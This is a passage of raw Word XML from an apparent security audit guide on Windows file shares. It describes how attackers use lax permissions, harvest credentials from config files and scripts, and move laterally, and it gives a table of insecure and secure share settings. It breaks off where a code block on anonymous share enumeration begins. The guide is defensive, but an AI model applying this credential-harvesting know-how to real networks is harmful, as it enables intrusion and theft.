          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0AB7F1" w14:textId="15894E39" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Path of Least Resistance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Knowing the environment is a lax one, the attacker will change tactics. Instead of burning a zero-day exploit or attempting some complex cryptographic attack, or some noisy attack, they will simply cruise slow-and-low staying below the defensive radar using such techniques that easily blend into background network noise and traffic, such as Living-Off-The-Land (LOTL) techniques. They might inject malicious scripts into a public deployment folder, harvest cleartext credentials left in a poorly secured department share, or pivot directly using administrative local tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA48BE1" w14:textId="5E918944" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>During a security assessment, both red and blue teams actively analyze these permissions matrices. Defenders map these configurations to identify structural gaps, inform remediation strategies, and enforce stricter Group Policy Objects (GPOs). Conversely, attackers profile these permissions to gauge the organization’s overall security maturity. Discovering a lax environment – such as broad read/write access or widespread local administrator rights – allows an attacker to map out a path of least resistance. Rather than deploying complex exploits, they can leverage these systemic governance flaws to rapidly execute lateral movement and progress through the attack chain.</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42C76" w14:paraId="40444515" w14:textId="77777777" w:rsidTr="00153AF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7F971A17" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00153AF6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62D0DF29" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00153AF6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">OTE </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>📌</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="020E1D03" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00153AF6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D4B5A13" w14:textId="1B567349" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Permissions profiling is a critical objective for both defenders and adversaries. For the blue team, visibility into share and file system permissions drives risk mitigation and targeted GPO enforcement. For an attacker, these permissions reveal the operational discipline of the IT department. If an adversary infers that the environment has overly permissive configurations they will immediately adjust and pivot their strategy. This structural intelligence allows them to bypass traditional defensive controls and fast-track their privilege escalation and lateral movement objectives.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D7E45B1" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00153AF6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E5421E1" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567E73F6" w14:textId="79D0A1AB"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Phase C: Content and Configuration Scraping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3CA589" w14:textId="6D45A70A" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The final phase mainly involves performing post-exploitation actions by analyzing what is inside the accessible shares:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64129127" w14:textId="7E9AAFFF" w:rsid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lastRenderedPageBreak/>
        <w:t>Configuration Files:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Auditing for </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.config, .ini, .xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> files that contain hardcoded SQL database passwords or API keys.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EE0FEA" w14:textId="735BA567" w:rsid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Deployment Scripts:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reviewing batch files (</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), VBScript (</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.vbs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), or PowerShell scripts (</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) that contain legacy administrative logic or hardcoded service account credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0259D54A" w14:textId="7C77390B"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Summary of Audit Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639E6F8C" w14:textId="5292EE1C" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When compiled, a directory share audit evaluates endpoints against a clear, established matrix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188FCA45" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">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442C76" w14:paraId="56532E7D" w14:textId="77777777" w:rsidTr="00442C76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="618CA48B" w14:textId="197DD52F" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Evaluation Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B91493A" w14:textId="14B95096" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Insecure State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FB32304" w14:textId="25382FA1" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Secure Target State</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442C76" w14:paraId="7A4D1F97" w14:textId="77777777" w:rsidTr="00442C76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="502B49AD" w14:textId="35D82A47" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Anonymous Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27B64AA4" w14:textId="030423DD" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Lists shares via Null Sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="175A326C" w14:textId="106F41EB" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Connection rejected immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442C76" w14:paraId="5DFC9DEC" w14:textId="77777777" w:rsidTr="00442C76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BC1D332" w14:textId="101C5B24" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Default Share Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55D0225E" w14:textId="0507F165" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SYSVOL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> contains credentials/passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CC35E12" w14:textId="3271CED5" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SYSVOL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> contains only generic GPO templates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442C76" w14:paraId="0A814B28" w14:textId="77777777" w:rsidTr="00442C76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F434837" w14:textId="52EF9E7D" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Custom Share ACLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13364BE3" w14:textId="1B2E9819" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Set to </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Everyone</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Authenticated Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2509F824" w14:textId="4B985902" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Set to specific AD Security Groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442C76" w14:paraId="0820BCA0" w14:textId="77777777" w:rsidTr="00442C76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D2CFB59" w14:textId="3DAF525B" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Transport Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61B3598D" w14:textId="7CA903E0" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Data sent in cleartext (SMB 2.1 / No signing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="387F565B" w14:textId="61C0EE57" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SMB 3.11 with forced encryption and signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79B47FAA" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A9B82C" w14:textId="043ED66B"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Anonymous Share Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A74FCE" w14:textId="6ADE066F" w:rsidR="00BE0FA4" w:rsidRPr="009270EB" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">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5042C33C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12A4C76A" w14:textId="77777777" w:rsidR="006D3130" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="257B465A" w14:textId="25E41417" w:rsidR="00AF0660" w:rsidRPr="00AF0660" w:rsidRDefault="00AF0660" w:rsidP="00AF0660">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
